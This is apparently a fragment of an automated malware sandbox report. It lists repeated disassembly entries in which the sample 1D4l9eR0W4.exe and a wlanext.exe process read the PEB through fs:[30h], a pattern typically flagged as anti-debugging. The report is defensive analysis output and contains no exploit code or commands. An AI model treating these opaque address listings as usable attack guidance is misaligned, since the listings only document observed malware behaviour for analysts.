Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]	3_2_018CD294
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CD294 mov eax, dword ptr fs:[00000030h]	3_2_018CD294
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]	3_2_018952A5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]	3_2_018952A5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]	3_2_018952A5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]	3_2_018952A5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018952A5 mov eax, dword ptr fs:[00000030h]	3_2_018952A5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]	3_2_018AAAB0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AAAB0 mov eax, dword ptr fs:[00000030h]	3_2_018AAAB0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CFAB0 mov eax, dword ptr fs:[00000030h]	3_2_018CFAB0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2ACB mov eax, dword ptr fs:[00000030h]	3_2_018C2ACB
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2AE4 mov eax, dword ptr fs:[00000030h]	3_2_018C2AE4
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A8A0A mov eax, dword ptr fs:[00000030h]	3_2_018A8A0A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]	3_2_0195AA16
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195AA16 mov eax, dword ptr fs:[00000030h]	3_2_0195AA16
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B3A1C mov eax, dword ptr fs:[00000030h]	3_2_018B3A1C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]	3_2_01895210
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01895210 mov ecx, dword ptr fs:[00000030h]	3_2_01895210
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]	3_2_01895210
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01895210 mov eax, dword ptr fs:[00000030h]	3_2_01895210
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]	3_2_0189AA16
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189AA16 mov eax, dword ptr fs:[00000030h]	3_2_0189AA16
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]	3_2_018D4A2C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D4A2C mov eax, dword ptr fs:[00000030h]	3_2_018D4A2C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BA229 mov eax, dword ptr fs:[00000030h]	3_2_018BA229
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195EA55 mov eax, dword ptr fs:[00000030h]	3_2_0195EA55
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01924257 mov eax, dword ptr fs:[00000030h]	3_2_01924257
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]	3_2_01899240
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]	3_2_01899240
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]	3_2_01899240
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01899240 mov eax, dword ptr fs:[00000030h]	3_2_01899240
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]	3_2_0194B260
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0194B260 mov eax, dword ptr fs:[00000030h]	3_2_0194B260
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01968A62 mov eax, dword ptr fs:[00000030h]	3_2_01968A62
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D927A mov eax, dword ptr fs:[00000030h]	3_2_018D927A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]	3_2_01892D8A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]	3_2_01892D8A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]	3_2_01892D8A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]	3_2_01892D8A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01892D8A mov eax, dword ptr fs:[00000030h]	3_2_01892D8A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]	3_2_018C2581
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]	3_2_018C2581
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]	3_2_018C2581
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C2581 mov eax, dword ptr fs:[00000030h]	3_2_018C2581
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]	3_2_018CFD9B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CFD9B mov eax, dword ptr fs:[00000030h]	3_2_018CFD9B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C35A1 mov eax, dword ptr fs:[00000030h]	3_2_018C35A1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]	3_2_018C1DB5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]	3_2_018C1DB5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C1DB5 mov eax, dword ptr fs:[00000030h]	3_2_018C1DB5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]	3_2_019605AC
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019605AC mov eax, dword ptr fs:[00000030h]	3_2_019605AC
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]	3_2_01916DC9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]	3_2_01916DC9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]	3_2_01916DC9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916DC9 mov ecx, dword ptr fs:[00000030h]	3_2_01916DC9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]	3_2_01916DC9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916DC9 mov eax, dword ptr fs:[00000030h]	3_2_01916DC9
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01948DF1 mov eax, dword ptr fs:[00000030h]	3_2_01948DF1
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]	3_2_018AD5E0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AD5E0 mov eax, dword ptr fs:[00000030h]	3_2_018AD5E0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0195FDE2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0195FDE2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0195FDE2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195FDE2 mov eax, dword ptr fs:[00000030h]	3_2_0195FDE2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01968D34 mov eax, dword ptr fs:[00000030h]	3_2_01968D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0191A537 mov eax, dword ptr fs:[00000030h]	3_2_0191A537
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195E539 mov eax, dword ptr fs:[00000030h]	3_2_0195E539
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]	3_2_018C4D3B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]	3_2_018C4D3B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C4D3B mov eax, dword ptr fs:[00000030h]	3_2_018C4D3B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189AD30 mov eax, dword ptr fs:[00000030h]	3_2_0189AD30
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A3D34 mov eax, dword ptr fs:[00000030h]	3_2_018A3D34
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D3D43 mov eax, dword ptr fs:[00000030h]	3_2_018D3D43
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01913540 mov eax, dword ptr fs:[00000030h]	3_2_01913540
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01943D40 mov eax, dword ptr fs:[00000030h]	3_2_01943D40
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B7D50 mov eax, dword ptr fs:[00000030h]	3_2_018B7D50
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]	3_2_018BC577
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BC577 mov eax, dword ptr fs:[00000030h]	3_2_018BC577
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A849B mov eax, dword ptr fs:[00000030h]	3_2_018A849B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h]	3_2_01968CD6
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]	3_2_01916CF0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]	3_2_01916CF0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]	3_2_01916CF0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019514FB mov eax, dword ptr fs:[00000030h]	3_2_019514FB
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]	3_2_01951C06
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]	3_2_0196740D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]	3_2_0196740D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]	3_2_0196740D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]	3_2_01916C0A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]	3_2_01916C0A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]	3_2_01916C0A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]	3_2_01916C0A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h]	3_2_018CBC2C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]	3_2_0192C450
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]	3_2_0192C450
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h]	3_2_018CA44B
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018B746D mov eax, dword ptr fs:[00000030h]	3_2_018B746D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]	3_2_01917794
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]	3_2_01917794
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]	3_2_01917794
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h]	3_2_018A8794
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h]	3_2_018D37F5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]	3_2_0192FF10
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]	3_2_0192FF10
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]	3_2_018CA70E
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]	3_2_018CA70E
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]	3_2_0196070D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]	3_2_0196070D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h]	3_2_018BF716
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]	3_2_01894F2E
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]	3_2_01894F2E
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h]	3_2_018CE730
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h]	3_2_018AEF40
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h]	3_2_018AFF60
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h]	3_2_01968F6A
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h]	3_2_0192FE87
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]	3_2_01960EA5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]	3_2_01960EA5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]	3_2_01960EA5
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h]	3_2_019146A7
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h]	3_2_01968ED6
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h]	3_2_018C36CC
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h]	3_2_018D8EC7
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h]	3_2_0194FEC0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h]	3_2_018A76E2
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h]	3_2_018C16E0
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]	3_2_0189C600
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]	3_2_0189C600
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]	3_2_0189C600
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h]	3_2_018C8E00
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]	3_2_018CA61C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]	3_2_018CA61C
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_01951608 mov eax, dword ptr fs:[00000030h]	3_2_01951608
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h]	3_2_0189E620
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h]	3_2_0194FE3F
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]	3_2_018A7E41
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]	3_2_018A7E41
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]	3_2_018A7E41
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]	3_2_018A7E41
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]	3_2_018A7E41
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]	3_2_018A7E41
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]	3_2_0195AE44
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]	3_2_0195AE44
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018A766D mov eax, dword ptr fs:[00000030h]	3_2_018A766D
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]	3_2_018BAE73
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]	3_2_018BAE73
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]	3_2_018BAE73
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]	3_2_018BAE73
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Code function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]	3_2_018BAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361DB60 mov ecx, dword ptr fs:[00000030h]	7_2_0361DB60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03643B7A mov eax, dword ptr fs:[00000030h]	7_2_03643B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03643B7A mov eax, dword ptr fs:[00000030h]	7_2_03643B7A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361DB40 mov eax, dword ptr fs:[00000030h]	7_2_0361DB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E8B58 mov eax, dword ptr fs:[00000030h]	7_2_036E8B58
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0361F358 mov eax, dword ptr fs:[00000030h]	7_2_0361F358
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036D131B mov eax, dword ptr fs:[00000030h]	7_2_036D131B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]	7_2_036403E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]	7_2_036403E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]	7_2_036403E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]	7_2_036403E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]	7_2_036403E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036403E2 mov eax, dword ptr fs:[00000030h]	7_2_036403E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0363DBE9 mov eax, dword ptr fs:[00000030h]	7_2_0363DBE9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036953CA mov eax, dword ptr fs:[00000030h]	7_2_036953CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036953CA mov eax, dword ptr fs:[00000030h]	7_2_036953CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03644BAD mov eax, dword ptr fs:[00000030h]	7_2_03644BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03644BAD mov eax, dword ptr fs:[00000030h]	7_2_03644BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03644BAD mov eax, dword ptr fs:[00000030h]	7_2_03644BAD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036E5BA5 mov eax, dword ptr fs:[00000030h]	7_2_036E5BA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_036D138A mov eax, dword ptr fs:[00000030h]	7_2_036D138A
